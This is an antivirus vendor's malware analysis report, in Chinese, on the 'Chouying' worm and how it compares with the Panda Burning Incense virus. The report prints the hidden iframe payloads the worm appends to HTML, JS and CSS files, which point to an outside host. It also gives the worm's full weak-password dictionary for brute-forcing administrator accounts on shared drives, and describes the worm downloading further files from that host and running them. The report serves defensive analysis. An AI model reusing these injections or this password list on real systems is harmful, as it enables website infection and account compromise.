瑞星最新病毒分析报告:“Worm.Chouying(仇英)”
病毒使用Delphi编写,Upack压缩。运行后将在%SYSTEM%目录下复制一份病毒本体文件,文件名为” Lying.exe”。病毒主程序(.exe)文件的主要功能是释放病毒动态库文件”Lying.dll”,并且该动态加载运行。病毒的主要功能代码都集中在这个动态库文件中。
该病毒的主要行为:
一、将病毒动态库文件”Lying.dll”加载到explorer.exe,services.exe,winlogon.exe三个进程中。
二、感染文件扩展名为".EXE"、".SCR"、".PIF"、".COM"、".BAT"的PE文件,感染的方式是将被感染文件作为文件的附加数据添加在病毒文件的尾部,将修改感染文件的图标资源使其图标与被感染文件一致。
三、修改文件扩展名为".HTM"、".HTML"、".ASP"、".ASPX"、".ASA"、".CDX"、".CER"、".PHP"、".JSP"、".INC"的文件,在文件尾部添加以下内容:
<iframe src="http://www.0x145b.com/fuck.htm" width="0" height="0" style="overflow:hidden;backgroup-color:black;border:none;" frameborder="0"></iframe>
(该网址并不存在,但是作者的目的很可能是通过包含漏洞的网页传播病毒)
四、修改文件扩展名为".JS"的文件,在文件尾部添加以下内容:
document.write(',27h,'<iframe src="http://www.0x145b.com/fuck.htm" width="0" height="0" style="overflow:hidden;backgroup-color:black;border:none;" frameborder="0"></iframe>);
(该网址并不存在,但是作者的目的很可能是通过包含漏洞的网页传播病毒)
五、修改文件扩展名为" .CSS"的文件,在文件尾部添加以下内容:
body {background-image: url(
javascript:document.write("<iframe src="http://www.0x145b.com/fuck.htm" width="0" height="0" style="overflow:hidden;backgroup-color:black;border:none;"frameborder="0"></iframe>"))}
(该网址并不存在,但是作者的目的很可能是通过包含漏洞的网页传播病毒)
六、通过局域网共享目录进行传播,并且其具有猜测计算机的弱口令的功能,
病毒会猜测以下用户的口令:“Administrator”、“admin”、“Root”。
使用的密码字典为:"root"、"Password"、"1234"、"12345"、"123456"、"1234567"、
"12345678"、"123456789"、"123321"、"654321"、"54321"、"4321"、"111111"、
"121212"、"123123"、"1234qwer"、"123abc"、"000000"、"00000000"、
"11111111"、"88888888"、"88888"、"pass"、"passwd"、"database"、
"abcd"、"abc123"、"oracle"、"sybase"、"123qwe"、"server"、
"computer"、"internet"、"super"、"123asd"、"ihavenopass"、
"godblessyou"、"enable"、"2004"、"2005"、"2006"、"2007"、
"2008"、"test123"、"admin123"、"wangba"、"user"、"users"、
"abcd123"、"asdf"、"asdf123"、"windows"、"windows2000"、
"windowsxp"、"windows2003"、"window"、"love"、"iloveyou"、
"loveyou"、"test"、"temp"、"hao123"、"adsl"、"kaonima"、
"happy"、"login"、"home"、"mylove"、"guest"、"data"、"date"、
"mypass"、"mypass123"、"fuck"、"cctv"、"live"、"zxcv"、"fuckyou"、
"999999"、"foobar"、"china"、"japan"、"temp123"、"yxcv"、
"guest123"、"guest321"、"5201314"、"5021314"、"ghost"、
"goodbye"、"byebye"、"520520"。
七、下载http://www.0x145b.com/Lying.ini这个文件,然后根据文件内容再下载其中的文件到本地计算机运行。
与”熊猫烧香”病毒的异同
与”熊猫烧香”病毒的相同点为:
1) 病毒的目的以及其作用相同,都是为了经济利益协助传播其他病毒;
2) 病毒的传播方式相同,同样是通过感染可执行文件、包含漏洞的网页、网络共享目录进行传播;
与”熊猫烧香”病毒的相同点为:
1) 感染文件的手段更隐蔽,”熊猫烧香”病毒感染文件后有很明显的现象,即:被感染的文件的图标都变成了病毒的图标;“仇英”病毒感染文件后被感染的文件从外表上看不出什么变化。
2) 修改的网页文件类型有所增加,加大了清除的难度。
3) 病毒的执行形态有所变化,病毒的主要功能包含在病毒的动态库文件中,并且该动态库文件被加载系统进程当中,使得病毒的感染、传播、下载其他病毒的行为可以持续进行。
“仇英”病毒的传播情况,及发展趋势
目前“仇英”病毒处于刚刚开始流传的阶段,并没开始大面积的传播,病毒传播的网址” http://www.0x145b.com”是虚假的,但是如果病毒的源代码被广泛流传,并且被不法分子利用,那么很可能又会造成与”熊猫烧香”病毒一样的后果。
“熊猫烧香”病毒变种传播情况
到目前为止瑞星公司已经截获了107个”熊猫烧香”病毒的变种。